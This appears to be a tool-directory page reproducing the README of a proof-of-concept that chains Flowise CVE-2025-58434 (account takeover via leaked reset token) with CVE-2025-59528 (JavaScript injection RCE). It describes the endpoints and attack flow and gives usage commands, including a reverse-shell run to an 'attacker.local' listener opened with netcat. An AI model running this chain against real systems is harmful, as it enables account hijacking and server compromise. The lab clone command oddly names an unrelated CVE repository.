Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Flowise-CVE-2025-58434-Chain-59528 — FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, demonstrating unauthenticated ATO via reset token leakage, followed by authenticated RCE. Includes a reproductible Docker lab environment. | Kitploit
Tools/GitHubGitHub/0xdaeras/flowise-cve-2025-58434-chain-59528
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHub0xdaeras/flowise-cve-2025-58434-chain-59528

Flowise-CVE-2025-58434-Chain-59528

FlowiseAI CVE-2025-58434 & CVE-2025-59528 exploit PoC, demonstrating unauthenticated ATO via reset token leakage, followed by authenticated RCE. Includes a reproductible Docker lab environment.

View Repository
164 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

FlowiseAI CVE Chain - ATO (CVE-2025-58434) and RCE (CVE-2025-59528)

CVE-2025-58434 CVSS-1 CVE-2025-59528 CVSS-2 Python License

⚠️ For educational and authorized security research only. Running this tool against systems you do not own or lack written permission to test is illegal.


Table of Contents

This repository contains a Python proof-of-concept for chaining two Flowise vulnerabilities:

  • CVE-2025-58434 — Account takeover through exposed password reset token behavior.
  • CVE-2025-59528 — Remote code execution through unsafe JavaScript evaluation in the CustomMCP node.

Flowise is a drag-and-drop platform for building LLM applications and AI agent workflows. CVE-2025-59528 affects Flowise 3.0.5 and was fixed in 3.0.6. The issue comes from unsafe processing of mcpServerConfig inside the CustomMCP node. CVE-2025-58434 is related to password reset token exposure and was also addressed in Flowise 3.0.6.

The tool supports:

  • Vulnerability check
  • Account takeover flow
  • Login and cookie retrieval
  • Authenticated RCE
  • Full chain mode: ATO → login → RCE

Vulnerability Details

CVE-2025-58434 — Account Takeover

  • CVE ID: CVE-2025-58434
  • CVSS v3.1 Score: 9.8 (Critical)
  • Vulnerability Type: Account Takeover / Authentication Bypass
  • Affected Product: Flowise
  • Affected Version Tested: Flowise 3.0.5
  • Fixed Version: Flowise 3.0.6
  • Authentication Required: No
  • Impact: Password reset token disclosure, account takeover

The vulnerable password reset flow exposes sensitive user data, including temporary password reset tokens, in the API response. An attacker who knows a valid user email address can request a password reset, retrieve the temporary token from the response, and use it to set a new password for the account.

The vulnerable behavior affects Flowise cloud and self-hosted/local deployments exposing the same API surface. The remediation is to never return password reset tokens or sensitive account reset data directly in API responses.

CVE-2025-59528 — Remote Code Execution

  • CVE ID: CVE-2025-59528
  • CVSS v3.1 Score: 10.0 (Critical)
  • Vulnerability Type: JavaScript Code Injection / Remote Code Execution
  • Affected Product: Flowise
  • Affected Version Tested: Flowise 3.0.5
  • Fixed Version: Flowise 3.0.6
  • Authentication Required: Yes
  • Impact: Arbitrary JavaScript execution inside the Node.js runtime, RCE on the server hosting Flowise

The vulnerability exists in Flowise's CustomMCP node. The mcpServerConfig parameter is parsed as part of the MCP server configuration process, and is evaluated as JavaScript code without any security validation. This allows an authenticated attacker to inject arbitrary JavaScript code, which is executed in the Node.js environment of the Flowise server. In the convertToValidJSONString function, the user input is passed to the Function constructor, which evaluates the input as JavaScript code with full Node.js privileges, allowing access to modules like child_process to execute system commands.

The vulnerable endpoint used by this PoC is:

POST /api/v1/node-load-method/customMCP

with js payload in the mcpServerConfig field of the JSON body, for example:

{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "..."
  }
}

Vulnerable code is found in the CustomMCP.ts file, and referenced in the Github Maintainer Advisory for the CVE.


Attack Flow

Attacker                                   Flowise
   │                                          │
   │  [CVE-2025-58434]                       │
   │  POST /api/v1/account/forgot-password   │
   │  { email }                              │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  user object + tempToken                 │
   │                                          │
   │  POST /api/v1/account/reset-password     │
   │  { email, tempToken, newPassword }       │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  password changed                        │
   │                                          │
   │  POST /api/v1/auth/login                 │
   │  { email, newPassword }                  │
   │─────────────────────────────────────────►│
   │◄─────────────────────────────────────────│
   │  token / refreshToken / connect.sid      │
   │                                          │
   │  [CVE-2025-59528]                       │
   │  POST /api/v1/node-load-method/customMCP │
   │  mcpServerConfig=<crafted config>        │
   │─────────────────────────────────────────►│
   │                              JS evaluated in Node.js
   │                              command executed
   │◄─────────────────────────────────────────│
   │  command output or payload fired         │
   │                                          │
   ✓  Account takeover + authenticated RCE

Repository structure:

Repository Structure
CVE-2025-58434-CVE-2025-59528/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
└── logs/

Installation

Tool

git clone https://github.com/0xDaeras/CVE-2025-58434-CVE-2025-59528-POC.git
cd CVE-2025-58434-CVE-2025-59528-POC
pip install -r requirements.txt

Docker Lab

git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env  # Configure environment variables
docker-compose up -d

Usage

Default Behavior

Without any arguments, the tool will run the full attack chain, checking the target vulnerability, performing account takeover for the provided email, logging in to retrieve cookies, and then exploiting the RCE vulnerability with a reverse shell payload. Run a dedicated listener (e.g., nc -lvnp 9889) before executing the tool in full chain mode.

python3 exploit.py --target http://localhost:3000 --email [email protected] --lhost attacker.local --lport 9889

Help Screen

python3 exploit.py -h

Modes

check-mode

Performs a version check to determine if the target is vulnerable to CVE-2025-58434 and CVE-2025-59528. It sends a request to the target's API and analyzes the response to identify the Flowise version and vulnerability status.

python3 exploit.py --target http://localhost:3000 check

ato-mode

Executes the account takeover process for CVE-2025-58434. It sends a password reset request for the specified email, retrieves the temporary token from the response, and then uses that token to set a new password (default: "Password123!") for the account.

python3 exploit.py --target http://localhost:3000 --email [email protected] ato-mode

login-mode

Logs in to the target using the specified email and password (default: "Password123!"). If successful, it retrieves and displays the authentication cookies (e.g., connect.sid) for use in authenticated requests.

python3 exploit.py --target http://localhost:3000 --email [email protected] --password Password123! login-mode
Download Tool